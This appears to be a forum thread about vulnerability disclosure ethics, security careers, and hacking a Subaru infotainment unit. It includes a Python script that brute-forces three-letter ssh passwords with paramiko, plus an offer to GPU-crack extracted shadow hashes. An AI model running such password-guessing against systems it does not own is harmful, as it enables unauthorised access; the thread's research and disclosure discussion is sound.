In total it was about 45 days from the initial conversation. I waited for a patched version to be released; the next important milestone after that would be finished backports to the older versions still in use, which is clearly going to take a long time since it isn't being prioritized, so I wanted to inform users now.
Initially I had said 90 days from the initial report, but it seemed like they were expanding the work to fill that time. I asked a number of times for them to publish a security advisory and got no answer. Some discussions on the repo showed they were treating this as a theoretical issue. It's now CVE-2024-51774, which was assigned within 48 hours of disclosure.
Any proof that actually happened, or are you just wearing a tin foil hat? Crypto enforcement en masse matters; intercepting highly specific targets using BitTorrent does not.
Honestly, I think full disclosure with a courtesy heads-up to the project maintainers/company is the most ethical strategy for everyone involved. “I found a thing. I will disclose it on Monday. No hard feelings.” With ridiculous 45-90 day windows it’s the users who take on almost all of the risk, and in many ways that’s just as unethical, if not more so, than some script kids catching wind before a patch is out. Every deployment of software is different, and downstream consumers should be able to make an immediate call on how to handle vulns that pop up.
Strongly disagree. 45 days to allow the authors to fix a bug that has been present for over a decade is not really much added risk for users. In this case, 45 days is about 1% additional time for the bug to be around. Maybe someone was exploiting it, but this extra time risk is a drop in the bucket, whereas releasing the bug immediately puts all users at high risk until a patch can be developed/released, and users update their software.
Maybe immediate disclosure would cause a few users to change their behavior, but no one is tracking security disclosures on all the software they use and changing their behavior based on them.
The caveat here is that if you have evidence of active exploitation, then immediate disclosure makes sense.
What if we changed the fundamental equation of the game: no more "responsible" disclosures, or define responsible as immediate and as widely published as possible (ideally with PoC). If anything, embargoes and timelines are irresponsible as they create unacceptable information asymmetry. An embargo is also an opportunity to back-room sell the facts of the embargo to the NSA or other national security apparatus on the downlow. An embargoed vulnerability will likely have a premium valuation model following something which rhymes with Black Scholes. Really, really think about it...
Warning shots across the bow in private are the polite and responsible way, but malicious actors don't typically extend such courtesies to their victims.
As such, compared to the alternative (bad actors having even more time to leverage and amplify the information asymmetry), a timely public disclosure is preferable, even with some unfortunate and unavoidable fallout. Typically security researchers are reasonable and want to do the right thing with regard to responsible disclosure.
On average, the "bigger party" inherently has more resources to respond compared to the reporter. This remains true even in open source software.
This is a pretty dangerous take. The reality is that the vast majority of security vulnerabilities in software are not actively exploited, because no one knows about them. Unless you have proof of active exploitation, you are much more likely to hurt users by publicly disclosing a 0-day than by responsibly disclosing it to the developer and giving them a reasonable amount of time to come out with a patch. Even if the developers are acting badly. Making a vulnerability public is putting a target on every user, not on the developer.
Your take is the dangerous one. I don’t disagree that
> the vast majority of security vulnerabilities in software are not actively exploited
However I’d say your explanation that it’s
> because no one knows about them
is not necessarily the reason why.
If the vendor or developer isn’t fixing things, going public is the correct option. (I agree some lead time / attempt at coordinated disclosure is preferable here.)
> (I agree some lead time / attempt at coordinated disclosure is preferable here.)
Then I think we are in agreement overall. I took your initial comment to mean that as soon as you discover a vulnerability, you should make it public. If we agree that the process should always be to disclose it to the project, wait some amount of time, and only then make it public - then I think we are actually on the exact same page.
Now, for the specific amount of time: ideally, you'd wait until the project has a patch available, if they are collaborating and prioritizing things appropriately. However, if they are dragging their feet and/or not even acknowledging that a fix is needed, then I also agree that you should set a fixed time as a last ditch attempt to get them to fix it (say, "2 weeks from today"), and then make it public as a 0-day.
Indeed, we’re in agreement. Though I’d suggest a fixed disclosure timeframe at time of reporting. Maybe with an option to extend in cases where the fix is more complex than anticipated.
My point is: if you found a vulnerability and know that it is actively being exploited (say, you find out through contacts, or see it on your own systems, or whatever), then I would agree that it is ethical to publicize it immediately, maybe without even giving the creators prior notice: the vulnerability is already known by at least some bad actors, and users should be made aware immediately and take action.
However, if you don't know that it is being actively exploited, then the right course of action is to disclose it privately to the creators, and work with them to coordinate a timely patch before any public disclosure. Exactly how timely will depend on your judgement and theirs across many factors. Even if the team is showing very bad judgement from your point of view and acting dismissively; even if you have a history with them of doing this - you still owe it to the users of the code to at least try, and to at least give some unilateral but reasonable timeline in which you will disclose.
Even if you don't want to do this free work, the alternative is not to publicly disclose: it's to do nothing. In general, the users are still safer with an unknown vulnerability than they are with a known one that the developers aren't fixing. You don't have any responsibility to waste your own time to try to work with disagreeable people, but you also don't have the right to put users at risk just because you found an issue.
It’s unethical to users who are at risk to withhold critical information.
If McDonald's had an E. coli outbreak and a keen doctor picked up on it, you wouldn't withhold that information from the public while McD developed a nice PR strategy and quietly waited for the storm to pass, would you?
Why is security, which seriously is a public safety issue, any different?
And some may already be taking advantage. This is a perfect example of a case where users are empowered to self-mitigate. You're relatively okay on private networks but definitely not on public ones. If I know when the bad actors know, then I can, e.g., not run qBittorrent at a coffee shop until it's patched.
What about a pre-digital bank? If you came across knowledge of a security issue potentially allowing anyone to steal stuff from their vault, would you release that information to the public? Would everyone knowing how to break in make everyone's valuables safer?
Medicine and biosafety are PvE. Cybersecurity is PvP.
It looks like you made the best of a frustrating situation and, at the very least, have an excellent piece for your portfolio.
With the rise in number of new security engineers all competing for few "security research" jobs (security research/hacking is the "I want to be a game developer" of security), you start getting into these convoluted hiring processes. Unlike standard software engineering, there aren't even remotely enough positions to accommodate everyone, so the bar can get absurdly high.
Honestly, if the team is asking CTF questions, they clearly want hires with previous CTF experience and should just do targeted hiring from the top teams at different conferences.
At least send people a free t-shirt if they complete the challenge.
> With the rise in number of new security engineers every year all competing for few "security research" jobs (security research/hacking is the "I want to be a game developer" of security)
I’ll believe it, curious what other options there are for all those other new “security engineers”. Compliance work?
If you're new, it's the same advice as any other field. Find a way to stand out. Build a portfolio, have great grades, come from a good university program, ping contacts from your alumni network, do bug bounties, find and fix issues in open-source, etc.
I took Seacord's virtual class (CMU SEI? Can't remember) on Secure C coding a few years back and own, love, and regularly use The CERT C Secure Coding Standard.
I learned from K&R, but highly recommend Seacord's books if you're looking for how to write secure C and a more modern take on some of the trickier parts of C.
Thanks! NCC Group is reselling the online Secure Coding Training and we also deliver instructor-led courses, although these might need to be delivered by webinar until the current crisis abates https://www.nccgroup.trust/us/our-services/cyber-security/se...
Ah I see, missed that the first time around. Another thing I’m wondering after processing this: did you ever try to ssh as the dm or daemon user after seeing the passwd file originally in ifs-subaru-gen3.raw?
P.S. Thank you for writing this! It’s super interesting and very easy to follow. I’ve shared it with friends both for the content and also as an example of excellent technical writing.
Thanks! I wish there was a service I could pay for where I could ask lawyers vague security-research related questions like this. Right now I wouldn't even know where to begin looking for a lawyer that would be an authority on this type of stuff. If I found that person, I'm also not sure I could afford their time.
I agree, but I don't have a consulting-firm/reputation/team of lawyers etc. to hide behind. Reporting embedded-related flaws to companies is often still scary today.
The point of this is that hey, this isn't actually that hard if you're willing to put in the time. If you're moderately talented, you can probably learn it too!
As opposed to the standard exploit write-up/security conference circuit thing, where a lot of the details are kept secret and it seems like the entire point is to make other people think you're cool instead of teaching something. :)
Getting things patched is awful. A reasonably simple thing I'd like is to secure myself against meddling by Subaru. That includes updates I don't agree with and tracking of my vehicle.
Disabling the network connection would pretty much stop the tracking. Alternatively, disabling GPS would work. Anybody worried about both stored data and about cellular companies reporting tower locations would need to disable both.
Undesired updates can mostly be stopped by disabling the network connection. Dealer service could be trouble; they might do an update without asking for my permission. Scrambling the crypto keys would probably stop the dealer service people from making updates.
Some of the above would also be needed to keep Subaru from uploading camera data taken in my garage. As it is now, Subaru could be watching me in my house!
1. I believe Harman had a previous device hacked back around 2014 due to a weak shadow hash. My guess is that they learned their lesson and made the password more complex. An easy way to test would be to diff the latest shadow file in the updated Subaru images (assuming they exist); a rough comparison sketch follows at the end of this comment. If it changed, you may be right; if not, I'd still wager it is strong enough.
I don't like the idea of a backdoor like that available, but it is what it is.
2. The QNX6 hashing mechanism, to the best of my knowledge, isn't fully understood. Upstream changes to JTR seem to indicate that it has some form of bug in it or isn't fully reverse-engineered. That, along with presumably having to spend a large amount of time learning about contributing to hashcat and GPU programming, made this seem like a potential dead end without a massive time investment.
So, is it possible it is crackable? Almost certainly, but I'm one guy doing this and you have to spend your time carefully in these ventures.
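For what it's worth, here's a minimal sketch of the shadow-diff idea in Python. It assumes you've already extracted /etc/shadow from each firmware image into plain text files (e.g. with a dumpifs-style tool); the file names and the "root" username are placeholders, not values taken from the actual images.

```python
# Minimal sketch: compare a user's shadow entry across two extracted images.
# old_shadow.txt / new_shadow.txt and the "root" user are placeholders.

def shadow_entry(path, user):
    """Return the hash field for `user` from a shadow-style file, if present."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        for line in f:
            fields = line.rstrip("\n").split(":")
            if fields and fields[0] == user:
                return fields[1] if len(fields) > 1 else None
    return None

old = shadow_entry("old_shadow.txt", "root")
new = shadow_entry("new_shadow.txt", "root")

if old is None or new is None:
    print("user not found in one of the files")
elif old == new:
    print("hash unchanged -- password likely not rotated between releases")
else:
    print("hash changed -- they may well have rotated/strengthened it")
```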
Thanks for the reply! That all makes sense. With the Mazda, I don't think anyone bothered to go as far as you did with the software, because it was so easy to get wifi turned on, connect, and then let your device try short password after password (and at just three lowercase letters, the result came fast).
Given the rest of the work and your first point, it does seem like yours is the smart choice in this case. I was just surprised you didn't try brute-forcing via ssh first (a rough sketch of that approach is at the end of this comment).
Thanks for the awesome article by the way! My Mazda got totalled last month, and I got a new 2019 Honda Fit I haven't gotten around to messing with yet. This gives some great ideas for how to proceed.
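To illustrate the brute-force idea, here's a minimal Python sketch using paramiko, strictly for poking at your own head unit. The host, port, and username below are placeholders rather than anything from the article or this thread.

```python
# Minimal sketch: try every 3-lowercase-letter password over ssh.
# HOST, PORT, and USER are hypothetical; requires `pip install paramiko`.
import itertools
import string

import paramiko

HOST, PORT, USER = "192.168.53.1", 22, "root"  # placeholders

def try_password(password):
    """Return True if the ssh login succeeds with this password."""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(HOST, port=PORT, username=USER, password=password,
                       timeout=5, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()

# Three lowercase letters -> only 26**3 = 17,576 candidates.
for candidate in map("".join, itertools.product(string.ascii_lowercase, repeat=3)):
    if try_password(candidate):
        print("found:", candidate)
        break
```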
I have a 2080Ti at home I can throw at it for a few days, if you're willing to share the hashes with me? I'm the same username on reddit if you're interested in DM-ing me.